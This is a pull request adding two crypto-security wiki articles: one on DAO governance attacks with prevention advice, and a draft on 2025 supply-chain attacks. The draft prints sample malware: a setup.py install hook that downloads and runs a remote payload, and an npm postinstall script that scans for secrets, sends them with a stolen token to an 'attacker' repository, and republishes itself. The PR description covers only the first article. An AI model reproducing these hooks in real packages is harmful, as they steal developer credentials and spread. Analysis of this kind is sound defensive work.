### PR TITLE
feat(content): Add wiki article: Governance Attacks

### DIFF
--- a/content/research/cyberattacks/wiki/governance-attacks.md
+++ b/content/research/cyberattacks/wiki/governance-attacks.md
@@ -1,0 +1,51 @@
+---
+title: "Governance Attacks"
+date: 2026-02-21
+description: "How attackers exploit DAO voting mechanisms to seize control of protocols and treasuries."
+tags: ["dao", "governance", "flash-loan", "exploit", "security"]
+weight: 65
+---
+
+# Governance Attacks (DAO Takeovers)
+
+Decentralized Autonomous Organizations (DAOs) rely on token-based voting to make decisions. **Governance Attacks** exploit this mechanism by accumulating enough voting power to pass malicious proposals. These proposals can grant the attacker access to the treasury, the ability to mint infinite tokens, or change critical protocol parameters.
+
+## The Mechanism
+
+In a standard DAO, 1 Token = 1 Vote. If an attacker controls >50% of the voting power (or just more than the quorum/opposition), they control the protocol.
+
+Attackers typically acquire this power in two ways:
+1.  **Flash Loans:** Borrowing millions of tokens for a single transaction block to vote on a proposal, then repaying the loan.
+2.  **Low Liquidity/Participation:** Buying tokens on the open market for cheap (if the market cap is low) or pushing proposals through when few honest holders are paying attention.
+
+## Famous Case Studies
+
+### 1. Beanstalk Farms (April 2022)
+*   **Loss:** ~$182 Million
+*   **Mechanism:** Flash Loan Governance Attack
+*   **Details:** The attacker used a flash loan to borrow nearly $1 billion in assets (ETH, USDC, DAI). They used these assets to buy enough Bean governance tokens to gain a 67% supermajority.
+*   **The Exploit:** With the supermajority, they instantly passed a proposal (BIP-18) that transferred all protocol funds to their own wallet.
+*   **Speed:** The entire attack happened in a single transaction. The "Emergency Commit" feature, designed to fix bugs quickly, allowed the proposal to bypass the usual waiting period.
+
+### 2. Build Finance (February 2022)
+*   **Loss:** ~$470,000 (plus total protocol control)
+*   **Mechanism:** Hostile Takeover via Apathy
+*   **Details:** A malicious actor submitted a proposal to give themselves full control over the BUILD token contract (minting rights).
+*   **The Failure:** The community failed to vote against it. The proposal passed with a small number of votes because the quorum requirements were loose.
+*   **Result:** The attacker minted millions of BUILD tokens, drained liquidity pools on Uniswap and Balancer, and effectively killed the project.
+
+### 3. True Seigniorage Dollar (ESD) & Others
+Many smaller algorithmic stablecoins have fallen victim to "governance arbitrage," where attackers buy cheap voting tokens to vote for payouts that exceed the cost of the tokens.
+
+## Prevention and Mitigation
+
+### 1. Flash Loan Guards
+*   **Snapshotting:** Voting power should be calculated based on token holdings at a *past block* (e.g., 1 block before the proposal was created), not the current block. This makes flash loans useless for voting, as the attacker didn't hold the tokens in the past.
+*   **Time-Locks:** Require a mandatory delay (e.g., 24-48 hours) between a proposal passing and its execution. This gives the community time to react to malicious governance.
+
+### 2. Quorum Requirements
+*   **Minimum Quorum:** Ensure a significant percentage of total supply (e.g., 4-10%) must vote for a proposal to pass. This prevents attackers from sneaking proposals through when engagement is low.
+*   **Veto Power:** Some DAOs (like Lido or Optimism) have dual-chamber systems or a "Guardian" multisig that can veto clearly malicious proposals during the time-lock period.
+
+### 3. Vote Delegation & Participation
+*   Actively encouraging token holders to delegate votes to trusted community members ensures that honest voting power is always online to counter attacks.

--- a/content/research/cyberattacks/wiki/supply-chain/index.md
+++ b/content/research/cyberattacks/wiki/supply-chain/index.md
@@ -1,0 +1,145 @@
+# [DRAFT] The 2025 Paradigm Shift: Why Private Key Leaks Outpaced Smart Contract Exploits
+
+**Article for dn-institute Crypto Attacks Wiki**
+
+## Abstract
+In 2025, the crypto security landscape witnessed a significant paradigm shift. While smart contract auditing has matured, attackers have pivoted, focusing on more vulnerable layers of the stack: the developer's toolkit and operational security. This article provides a technical analysis of two prominent supply chain attacks from 2025, demonstrating how poisoned software updates and private key mismanagement have become the primary vector for multi-million dollar losses, outpacing traditional on-chain exploits.
+
+---
+
+## 1. Introduction: The Evolving Threat Model
+
+For years, the focus of crypto security has been on-chain: auditing Solidity, formal verification, and gas optimization. However, as on-chain security practices have improved, the economic incentive for attackers has shifted. The path of least resistance is no longer the contract, but the human and the tools they use. In 2025, we saw this trend accelerate, with supply chain attacks and private key compromises accounting for over $3 billion in losses.
+
+This report will dissect two specific case studies that exemplify this new paradigm.
+
+---
+
+## 2. Case Study: The Python `bitcoinlib` Typosquatting Attack
+
+**Vector:** Software Supply Chain (Typosquatting)
+**Target:** Python developers using the `bitcoinlib` library
+
+### 2.1. Attack Analysis
+
+In mid-2025, security researchers identified malicious packages uploaded to the Python Package Index (PyPI). The attack did not compromise the legitimate `bitcoinlib` package. Instead, it relied on a classic typosquatting technique.
+
+*   **Malicious Packages:** `bitcoinlibdbfix` and `bitcoinlib-dev`
+*   **Mechanism:** Attackers assumed developers would either mistype the package name (`pip install bitcoinlib-dev`) or believe these were legitimate, auxiliary packages for database fixes or development versions.
+*   **Payload:** The `setup.py` file in these packages contained obfuscated code that executed upon installation. It scanned the user's home directory for common wallet file names (`wallet.dat`, etc.) and developer credentials (`.env` files, ssh keys) and exfiltrated them to a remote server.
+
+### 2.2. Technical Breakdown
+
+The malware's execution flow, based on analysis of similar typosquatting packages, followed a multi-stage process:
+
+1.  **Initial Compromise (`setup.py`):** The attack was initiated via the `setup.py` script. Instead of containing legitimate setup logic, it housed a small piece of code designed to download a second-stage payload from an external source, often a file-sharing site like AnonFiles.
+
+    ```python
+    # Simplified example of malicious code in setup.py
+    import subprocess
+    import requests
+
+    def get_payload():
+        url = "https://anonfiles.com/some-malicious-payload"
+        response = requests.get(url)
+        # The malware often parsed the HTML to find the real download link
+        # ... parsing logic ...
+        real_download_link = "https://..." 
+        payload_content = requests.get(real_download_link).content
+        
+        # Write payload to a temporary executable file
+        with open("/tmp/payload.exe", "wb") as f:
+            f.write(payload_content)
+        
+        # Execute the payload
+        subprocess.run(["/tmp/payload.exe"])
+
+    # Hijack the install process
+    from setuptools.command.install import install
+    class MaliciousInstall(install):
+        def run(self):
+            get_payload()
+            install.run(self)
+    
+    # ... setup config ...
+    setup(
+        # ...,
+        cmdclass={'install': MaliciousInstall}
+    )
+    ```
+
+2.  **Second-Stage Payload (Packed Executable):** The downloaded file was not the final malware but a packed executable (often created with `pyinstaller`). This executable contained the actual malicious Python script along with a Python interpreter, allowing it to run even on systems without Python installed.
+
+3.  **Data Exfiltration:** Once executed, the unpacked Python script would:
+    *   Scan the filesystem for sensitive files, prioritizing cryptocurrency wallet data (e.g., `Exodus/exodus.wallet`) and developer credentials.
+    *   Use Discord webhooks for C2 (Command and Control) communication and data exfiltration, a common technique to blend in with legitimate traffic.
+    *   Implement sandbox evasion techniques, such as checking for the presence of a debugger (`IsDebuggerPresent`), to hinder analysis.
+
+---
+
+## 3. Case Study: The NPM Credential Harvesting Worm
+
+**Vector:** Software Supply Chain (Dependency Confusion / Malicious Packages)
+**Target:** NodeJS developers and CI/CD pipelines
+
+### 3.1. Attack Analysis
+
+Throughout 2025, a series of malicious NPM packages were discovered that aimed to steal developer credentials, specifically GitHub and NPM tokens.
+
+*   **Mechanism:** These packages were often published with names similar to popular libraries or as dependencies of other compromised packages. Once installed (e.g., via `npm install`), a `postinstall` script would execute.
+*   **Payload:** The script searched for environment variables and configuration files (`.npmrc`, `.git-credentials`) containing authentication tokens.
+*   **Propagation:** The truly novel aspect was its worm-like behavior. Upon successfully stealing a GitHub token with repository write access, the malware would use the GitHub API to commit malicious code into the victim's own public repositories, thus infecting their projects and creating a new distribution vector for the malware. For example, it would query `/user/repos?affiliation=owner,collaborator` to find viable targets.
+
+### 3.2. Technical Breakdown
+
+Analysis of the "Shai-Hulud" worm, a prominent example of this attack vector, reveals a sophisticated propagation and data theft mechanism:
+
+1.  **Initial Infection (`postinstall` script):** The attack began when a developer installed a compromised NPM package. A malicious `postinstall` script, configured in the package's `package.json`, would execute automatically.
+
+2.  **Credential Scanning:** The script then used embedded tooling, such as a version of the open-source secret scanner `TruffleHog`, to aggressively scan the local environment. It searched for:
+    *   Environment variables.
+    *   Configuration files like `.npmrc` and `.git-credentials`.
+    *   Cloud credentials exposed via local metadata services (IMDS).
+
+3.  **Data Exfiltration:** Discovered secrets were exfiltrated to the attacker. A common method was to encode the stolen data (often double base64) and push it to a public GitHub repository controlled by the attacker, using a stolen GitHub token for authentication.
+
+4.  **Propagation (Worm Behavior):** This was the most critical phase. If the malware discovered an NPM token with publishing rights or a GitHub token with write access to repositories containing NPM packages, it would:
+    *   Read the `package.json` of the victim's own packages.
+    *   Inject itself as a dependency or into the `postinstall` script.
+    *   Increment the package version number.
+    *   Run `npm publish` to push the newly infected version to the public NPM registry, effectively spreading the worm to any project that depended on the compromised package.
+
+    ```javascript
+    // Conceptual example of a malicious postinstall script
+    const { execSync } = require('child_process');
+
+    try {
+      // 1. Scan for credentials
+      const secrets = execSync('trufflehog filesystem / --json').toString();
+      
+      // 2. Exfiltrate data
+      const encodedSecrets = Buffer.from(secrets).toString('base64');
+      // Use a stolen GitHub token to push secrets to a repo
+      execSync(`curl -X PUT -H "Authorization: token ${process.env.STOLEN_GITHUB_TOKEN}" -d '{"content":"${encodedSecrets}"}' https://api.github.com/repos/attacker/repo/contents/stolen_data.json`);
+
+      // 3. Propagate if valuable tokens are found
+      if (process.env.NPM_TOKEN) {
+        // Find local package.json files, inject malware, increment version, and publish
+        // ... propagation logic ...
+        execSync('npm publish');
+      }
+    } catch (e) {
+      // Fail silently
+    }
+    ```
+
+---
+
+## 4. Conclusion: The New Security Frontier
+
+The `bitcoinlib` and NPM attacks highlight a crucial lesson for 2026 and beyond: on-chain security is no longer sufficient. The new frontier is off-chain, focusing on developer-centric threats:
+*   **Dependency Hygiene:** Verifying package names and avoiding untrusted dependencies.
+*   **Credential Management:** Using hardware wallets and avoiding storing plaintext keys.
+*   **CI/CD Security:** Locking down pipeline access and scanning for malicious scripts.
+
+The economic incentives for attackers will always drive them toward the weakest link. In 2025, that link was unequivocally the software supply chain.


### PR DESCRIPTION
Adds a new article to the Crypto Attacks Wiki covering Governance Attacks (DAO Takeovers). Includes mechanism explanation, Beanstalk Farms and Build Finance case studies, and prevention strategies (Snapshotting, Time-Locks). Part of the bounty program.